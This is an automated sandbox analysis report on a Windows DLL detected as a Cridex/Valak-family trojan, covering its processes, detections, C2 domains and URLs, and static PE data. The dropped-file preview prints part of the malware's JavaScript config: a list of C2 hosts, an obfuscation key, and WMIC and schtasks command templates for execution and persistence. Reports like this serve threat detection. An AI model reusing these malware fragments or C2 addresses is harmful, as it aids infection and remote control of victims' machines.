                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756451 Sample: draw.dll Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 30 organicgreensfl.com 2->30 44 Snort IDS alert for network traffic 2->44 46 Multi AV Scanner detection for domain / URL 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 5 other signatures 2->50 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 cmd.exe 1 9->11         started        13 wscript.exe 9->13         started        17 rundll32.exe 9->17         started        19 conhost.exe 9->19         started        dnsIp6 21 rundll32.exe 1 11->21         started        38 knockoutlights.com 207.148.248.143, 49705, 49706, 80 BIZLAND-SDUS United States 13->38 40 a-zcorner.com 13->40 42 2 other IPs or domains 13->42 54 System process connects to network (likely due to code injection or exploit) 13->54 signatures7 process8 file9 28 C:\Users\Public\iVIwVADQD.eLxan, ASCII 21->28 dropped 24 wscript.exe 12 21->24         started        process10 dnsIp11 32 knockoutlights.com 24->32 34 a-zcorner.com 24->34 36 2 other IPs or domains 24->36 52 System process connects to network (likely due to code injection or exploit) 24->52 signatures12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    No bigger version
                    No bigger version
                    No bigger version

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    draw.dll83%ReversingLabsWin32.Worm.Cridex
                    draw.dll76%VirustotalBrowse
                    draw.dll100%AviraTR/Kryptik.ytszl
                    draw.dll100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    knockoutlights.com13%VirustotalBrowse
                    a-zcorner.com9%VirustotalBrowse
                    organicgreensfl.com6%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://a-zcorner.com/100%Avira URL Cloudmalware
                    http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3100%Avira URL Cloudmalware
                    http://d0d0f3d189430.com100%Avira URL Cloudmalware
                    http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=b2Z1Y309Q0JUTFNIVyowNjFTMDA2PUN0%Avira URL Cloudsafe
                    http://organicgreensfl.com/0%Avira URL Cloudsafe
                    http://organicgreensfl.com0%Avira URL Cloudsafe
                    http://knockoutlights.com100%Avira URL Cloudmalware
                    http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=0%Avira URL Cloudsafe
                    http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3100%Avira URL Cloudmalware
                    http://d0d0abee1d18255e.comXN0%Avira URL Cloudsafe
                    http://a-zcorner.com100%Avira URL Cloudmalware
                    http://d0d0abee1d18255e.com100%Avira URL Cloudmalware
                    http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDVU1SSVYrMTcwUjExNzxgZ2p1Yzw0MGM1YDU1NDxrZ2I0Pzw1NDwyNT81&client=tarbneghyrdfwglztdpcknpjvzxbxtm&service_id=FE05211&ubwG=payxcvavvogx100%Avira URL Cloudmalware
                    http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1Pk100%Avira URL Cloudmalware
                    http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9EWyY8Oj1fPDw6MU9OWEBfR100%Avira URL Cloudmalware
                    http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3U1S0pcRFtAXyI4PjlbODg%2BNUtKXER100%Avira URL Cloudmalware
                    http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=b100%Avira URL Cloudmalware
                    http://organicgreensfl.com/he0%Avira URL Cloudsafe
                    http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=YWh7bXMzTUxaQl1GWSQ%2BOD9dPj44M0%Avira URL Cloudsafe
                    http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJD100%Avira URL Cloudmalware
                    http://msnbot-207-46-194-33.search.msn.com50%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    knockoutlights.com
                    		207.148.248.143
                    		truetrueunknown
                    ec.atdmt.com
                    		unknown
                    		unknownfalse
                      		high
                      msnbot-207-46-194-33.search.msn.com
                      		unknown
                      		unknownfalse
                        		high
                        organicgreensfl.com
                        		unknown
                        		unknownfalseunknown
                        a-zcorner.com
                        		unknown
                        		unknowntrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDVU1SSVYrMTcwUjExNzxgZ2p1Yzw0MGM1YDU1NDxrZ2I0Pzw1NDwyNT81&client=tarbneghyrdfwglztdpcknpjvzxbxtm&service_id=FE05211&ubwG=payxcvavvogxtrue
                        • Avira URL Cloud: malware
                        		unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=ZG1%2Bawscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=b2Z1Y309Q0JUTFNIVyowNjFTMDA2PUNwscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://d0d0f3d189430.comwscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://a-zcorner.com/wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://ec.atdmt.com/194-33.search.msn.com/wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://msnbot-207-46-194-33.search.msn.comloaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769445270.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drfalse
                              		high
                              http://organicgreensfl.com/wscript.exe, 0000000C.00000002.769378758.000000000089F000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://organicgreensfl.comwscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drtrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://d0d0abee1d18255e.comXNwscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=ZG1%2BaHY2SElfR1hDXCE7PTpYOzs9NkhJX0dYwscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://knockoutlights.comwscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drtrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769499595.0000000004B31000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769524971.0000000004BB1000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://a-zcorner.comwscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drtrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://ec.atdmt.com/wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://d0d0abee1d18255e.comloaddll32.exe, 00000000.00000003.543709886.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.539757980.0000000003340000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9wscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://msnbot-207-46-194-33.search.msn.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJwscript.exe, 0000000C.00000002.769105699.0000000000841000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753900638.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769313214.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753950766.0000000000849000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=YGl6bHIyTE1bQ1xHWCU%2FOT5cPz85MkxNW0Ncwscript.exe, 0000000C.00000003.753900638.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769313214.000000000088F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://ec.atdmt.com/Wwscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bGV2YH4%2BQEFXT1BLVCkzNTJQMzM1Pkwscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769249439.00000000007E1000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Y2p5b3ExT05YQF9EWyY8Oj1fPDw6MU9OWEBfRwscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769679607.00000000051D0000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://msnbot-207-46-194-33.search.msn.com/Gwscript.exe, 0000000C.00000002.769178783.0000000000860000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://ec.atdmt.com/rpc.aspx?winrm=2387&view2=classic&regclid=YGl6bHIwscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://a-zcorner.com/rpc.aspx?winrm=2387&view2=classic&regclid=Z259a3U1S0pcRFtAXyI4PjlbODg%2BNUtKXERwscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://msnbot-207-46-194-33.search.msn.com/wscript.exe, 0000000C.00000003.753860322.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bwscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769397829.0000000000D16000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://organicgreensfl.com/hewscript.exe, 0000000C.00000002.769056047.000000000082B000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://organicgreensfl.com/rpc.aspx?winrm=2387&view2=classic&regclid=YWh7bXMzTUxaQl1GWSQ%2BOD9dPj44Mwscript.exe, 00000010.00000002.769718218.00000000051A0000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://ec.atdmt.comwscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, iVIwVADQD.eLxan.4.drfalse
                                                    		high
                                                    http://knockoutlights.com/rpc.aspx?winrm=2387&view2=classic&regclid=bmd0Ynw8QkNVTVJJVisxNzBSMTE3PEJDwscript.exe, 0000000C.00000002.769378758.000000000089F000.00000004.00000020.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://msnbot-207-46-194-33.search.msn.com5wscript.exe, 0000000C.00000003.663663437.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541881581.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.769524116.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541855896.0000000004B3E000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000003.541894520.0000000004B43000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545215444.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545195745.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545061419.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.544989775.0000000004BCF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.769545219.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.663036731.0000000004BD5000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.545168174.0000000004BD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    207.148.248.143
                                                    		knockoutlights.comUnited States
                                                    		29873BIZLAND-SDUStrue

                                                    General Information

                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                                    Analysis ID:756451
                                                    Start date and time:2022-11-30 08:54:12 +01:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 7m 4s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:draw.dll
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:24
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winDLL@12/1@10/1
                                                    EGA Information:Failed
                                                    HDC Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .dll
                                                    • Override analysis time to 240s for rundll32
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, wermgr.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, WmiApSrv.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 152.199.19.161
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, atlasdmt.vo.msecnd.net, az361816.vo.msecnd.net, cs9.wpc.v0cdn.net
                                                    • Execution Graph export aborted for target loaddll32.exe, PID 5220 because there are no executed function
                                                    • Execution Graph export aborted for target rundll32.exe, PID 6128 because there are no executed function
                                                    • Execution Graph export aborted for target wscript.exe, PID 3680 because there are no executed function
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    08:57:25API Interceptor1x Sleep call for process: loaddll32.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASNs

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\Public\iVIwVADQD.eLxan

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):23564
                                                    Entropy (8bit):5.438761228660278
                                                    Encrypted:false
                                                    SSDEEP:384:dJrMlicWXPzLMW7FhSci6kzRcZsHapJrMlicWXPzLMW7FhSci6kzRcZsHar:dEijPzLpSc2RcZsHapEijPzLpSc2RcZV
                                                    MD5:AC601D9D01A57918D277C8C95CF9C27D
                                                    SHA1:AED1F0882ABCBC5B733967049530F408AA1D5AE7
                                                    SHA-256:3A74B66A731DBA8D16495903F7E995FDA63E3EF5DF475775D739123ADD501E0D
                                                    SHA-512:A8C93D2D279550573D8E5608E2B9F0A636751B29252EF1E2AE5EAD3B288B8C79F6550719048822436D62A2FA75C83A02CE02DFA0C1274E7F4612FB79C4F6DDA9
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_Allatori_Valak, Description: Yara detected Valak, Source: C:\Users\Public\iVIwVADQD.eLxan, Author: Joe Security
                                                    • Rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery, Description: Detects JS potentially executing WMI queries, Source: C:\Users\Public\iVIwVADQD.eLxan, Author: ditekSHen
                                                    Reputation:low
                                                    Preview:var config = {.. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],.. SOFT_SIG : 'mad29',.. SOFT_VERSION: 32,.. C2_REQUEST_SLEEP : 21,.. C2_FAIL_SLEEP : 21,.. C2_FAIL_COUNT : 20,.. C2_OB_KEY : 'JxTRG4mY',...... C2_PREFIX : 'rpc.aspx'..}......var SELECTED_C2 = config.PRIMARY_C2[0];......Math.imul = function (a, b) {.. var ah = (a >>> 16) & 0xffff;.. var al = a & 0xffff;.. var bh = (b >>> 16) & 0xffff;.. var bl = b & 0xffff;.. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);..};......var GlobalStrings = {.. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",.. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",.. WMIC_EXEC : "wmic process call create \"%path%\"",.. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%comma

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):6.607669812933409
                                                    TrID:
                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                    • DOS Executable Generic (2002/1) 0.20%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:draw.dll
                                                    File size:311808
                                                    MD5:78e05075e686397097de69fb0402263e
                                                    SHA1:f3e9e7f321deb1a3408053168a6a67c6cd70e114
                                                    SHA256:3769a84dbe7ba74ad7b0b355a864483d3562888a67806082ff094a56ce73bf7e
                                                    SHA512:746a430aaad88fa150e7709ed834834fe5d9483c2d92c4838cd26b6f4dad960480daae7dec2a66fb4023c2cbfc316f820f809a7e51a7425900b33fe425759f2b
                                                    SSDEEP:6144:qvcrjpzLkdo1R6HNX3/jllAbTlj1/BVICh:oaCduiNnHA/Be
                                                    TLSH:0B64CF2136E18032F25B5B389457C2715BBEBC949B78D6CB9BC003AE5B231D19B78787
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k.=...n...n...n.X.n...n.X.n...n.X.n\..n.r.n...n...n...n.X.n...n.X.n...n.X.n...n.X.n...nRich...n................PE..L...[].^...

                                                    File Icon

                                                    Icon Hash:74f0e4ecccdce0e4

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x10005962
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x10000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                                    DLL Characteristics:
                                                    Time Stamp:0x5ED75D5B [Wed Jun 3 08:20:43 2020 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:3f31bb7bb53b534359adef9d369abdc6
                                                    Instruction
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    cmp dword ptr [ebp+0Ch], 01h
                                                    jne 00007F0D64926867h
                                                    call 00007F0D6492CEFFh
                                                    push dword ptr [ebp+08h]
                                                    mov ecx, dword ptr [ebp+10h]
                                                    mov edx, dword ptr [ebp+0Ch]
                                                    call 00007F0D64926751h
                                                    pop ecx
                                                    pop ebp
                                                    retn 000Ch
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    mov eax, dword ptr [ebp+08h]
                                                    xor ecx, ecx
                                                    cmp eax, dword ptr [10046310h+ecx*8]
                                                    je 00007F0D64926875h
                                                    inc ecx
                                                    cmp ecx, 2Dh
                                                    jc 00007F0D64926853h
                                                    lea ecx, dword ptr [eax-13h]
                                                    cmp ecx, 11h
                                                    jnbe 00007F0D64926870h
                                                    push 0000000Dh
                                                    pop eax
                                                    pop ebp
                                                    ret
                                                    mov eax, dword ptr [10046314h+ecx*8]
                                                    pop ebp
                                                    ret
                                                    add eax, FFFFFF44h
                                                    push 0000000Eh
                                                    pop ecx
                                                    cmp ecx, eax
                                                    sbb eax, eax
                                                    and eax, ecx
                                                    add eax, 08h
                                                    pop ebp
                                                    ret
                                                    call 00007F0D6492B75Fh
                                                    test eax, eax
                                                    jne 00007F0D64926868h
                                                    mov eax, 10046478h
                                                    ret
                                                    add eax, 08h
                                                    ret
                                                    call 00007F0D6492B74Ch
                                                    test eax, eax
                                                    jne 00007F0D64926868h
                                                    mov eax, 1004647Ch
                                                    ret
                                                    add eax, 0Ch
                                                    ret
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    call 00007F0D64926847h
                                                    mov ecx, dword ptr [ebp+08h]
                                                    push ecx
                                                    mov dword ptr [eax], ecx
                                                    call 00007F0D649267E7h
                                                    pop ecx
                                                    mov esi, eax
                                                    call 00007F0D64926821h
                                                    mov dword ptr [eax], esi
                                                    pop esi
                                                    pop ebp
                                                    ret
                                                    mov edi, edi
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 4Ch
                                                    mov eax, dword ptr [10046734h]
                                                    xor eax, ebp
                                                    mov dword ptr [ebp-04h], eax
                                                    push ebx
                                                    xor ebx, ebx
                                                    push esi
                                                    mov esi, dword ptr [ebp+08h]
                                                    Programming Language:
